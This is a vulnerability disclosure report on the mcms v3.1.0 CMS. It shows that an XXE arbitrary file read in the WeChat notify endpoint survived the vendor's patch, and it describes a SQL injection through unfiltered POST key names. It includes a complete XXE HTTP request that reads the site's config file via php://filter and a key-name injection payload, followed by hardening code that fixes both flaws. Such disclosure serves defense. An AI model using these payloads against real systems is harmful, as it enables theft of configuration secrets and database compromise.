### Brief description:
As the title says.
### Details:
First, the arbitrary file read.
The previous submission was [WooYun: mcms v3.1.0 SQL injection + arbitrary file read](http://www.wooyun.org/bugs/wooyun-2015-090986).
The vendor's fix was:
```php
$wx=new weixin();
$_GET = H::sqlxss($_GET);   // added by the vendor
$_POST = H::sqlxss($_POST); // added by the vendor
// ...........
function response_msg(){
global $dbm,$C;
$postStr = $GLOBALS["HTTP_RAW_POST_DATA"];
if(!empty($postStr)){
// the raw POST body goes straight into the XML parser; a DOCTYPE that declares an external entity is still honoured
$postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA);
$fromUsername = $postObj->FromUserName;
$toUsername = $postObj->ToUserName;
// ...
$keyword = trim($postObj->Content);
$keyword = H::sqlxss($keyword); // added by the vendor
```
The only change is the addition of `$_GET = H::sqlxss($_GET);`, `$_POST = H::sqlxss($_POST);` and `$keyword = H::sqlxss($keyword);`.
That does stop the injection.
But the arbitrary file read still works~
POST:
```http
POST //app/weixin/notify.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=9vl7m4ivoovc76am47nrnr3m81; CNZZDATA1253530733=784223860-1426700537-%7C1426700537; skip_url=mycenter.php
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Content-Type: text/xml
Content-Length: 262

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE copyright [
<!ENTITY test SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/Wamp/www/config/global.php">
]>
<xml>
<ToUserName>&test;</ToUserName>
<Content>a\</Content>
</xml>
```
![1.png](https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png)
![2.png](https://images.seebug.org/upload/201503/19024329bff27c37615ebc73e574eccc0f332ee9.png)
Now the injection.
D:/wamp/www/app/user/info.php
```php
function m__save(){
global $dbm,$C,$V;
$_POST['info_body']=strip_tags($_POST['info_body'], '<p><a><img>');
$_POST=H::sqlxss($_POST); // filters the values only, never the keys
// handle attachment parameters
$attach= $oname = $order = $model_fields = array();
foreach($_POST as $k=>$v){
if(substr($k,0,9)=='attach___'){
$attach[$v]=$v;
$oname[$v]=($_POST['oname___'.$v]==''?'':$_POST['oname___'.$v]);
$order[$v]=($_POST['order___'.$v]==''?'':$_POST['order___'.$v]);
}
if (substr($k,0,9)=='extern___') { // populate extension-table fields
$model_fields[substr($k,9)] = $v;
}
}
......
if($fields['model_name']!=''){
$model_fields['info_id']=$info_id;
// pre-process certain values, e.g. dates
foreach($model_fields as $k=>$v) {
// $k is an unfiltered POST key name concatenated straight into the query
$sql = "select form_type from ".TB_PRE."model_fields where model_name='".$fields['model_name']."' and field_name='".$k."' limit 1";
```
Because the key names are never filtered, the injection happens here.
POST:
```
info_id=1&cate_id=2&model_name=product&info_title=aaaaaa&info_img=&info_body=11&extern___test 'sql语句=1
```
![11.png](https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png)
As you can see, the single quote gets through. Time-based blind injection is possible- -
### Proof of vulnerability:
![11.png](https://images.seebug.org/upload/201503/19025030d6bdb397b69059caf1a4886212964be1.png)
![1.png](https://images.seebug.org/upload/201503/190243227e2c76e8065c15d6f658b8dcc0009141.png)
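As an added hardening example (not mcms code and not the vendor's patch) covering both issues above: the WeChat callback body is parsed with external entities disabled and any DOCTYPE rejected, and `extern___` field names are validated as identifiers and then bound as values rather than concatenated. It assumes `TB_PRE` is the table prefix constant and that the callback XML never legitimately carries a DOCTYPE.

```php
<?php
// Hardening example written for this report; not part of mcms.
defined('TB_PRE') or define('TB_PRE', 'mc_'); // assumed table prefix

// 1. Parse the callback body without resolving external entities (fixes the XXE).
function parse_notify_xml(string $postStr): ?SimpleXMLElement {
    // The callback format needs no DTD, and a DTD is the only place an external
    // entity (like the php://filter one in the PoC) can be declared: refuse it.
    if (preg_match('/<!DOCTYPE/i', $postStr)) {
        return null;
    }
    // On PHP < 8.0 external entity loading must be switched off explicitly;
    // PHP >= 8.0 already has it off and deprecates this call.
    if (PHP_VERSION_ID < 80000) {
        libxml_disable_entity_loader(true);
    }
    libxml_use_internal_errors(true);
    // No LIBXML_NOENT / LIBXML_DTDLOAD, and NONET blocks any network fetch.
    $obj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA | LIBXML_NONET);
    return $obj === false ? null : $obj;
}

// 2. Keep only extension field names that are plain identifiers (fixes the key injection).
function extern_fields(array $post): array {
    $fields = [];
    foreach ($post as $k => $v) {
        if (substr($k, 0, 9) !== 'extern___') {
            continue;
        }
        $name = substr($k, 9);
        // "test 'sql..." from the PoC fails this check and is dropped
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_]{0,63}$/', $name)) {
            continue;
        }
        $fields[$name] = $v;
    }
    return $fields;
}

// 3. Look up form_type with bound parameters instead of string concatenation.
function form_type_for(PDO $db, string $modelName, string $fieldName): ?string {
    $stmt = $db->prepare('SELECT form_type FROM ' . TB_PRE . 'model_fields'
        . ' WHERE model_name = ? AND field_name = ? LIMIT 1');
    $stmt->execute([$modelName, $fieldName]);
    $row = $stmt->fetchColumn();
    return $row === false ? null : $row;
}
```

The identifier check is the important part for the second bug: `H::sqlxss()` only ever sees values, so the key name has to be validated separately before it reaches any query.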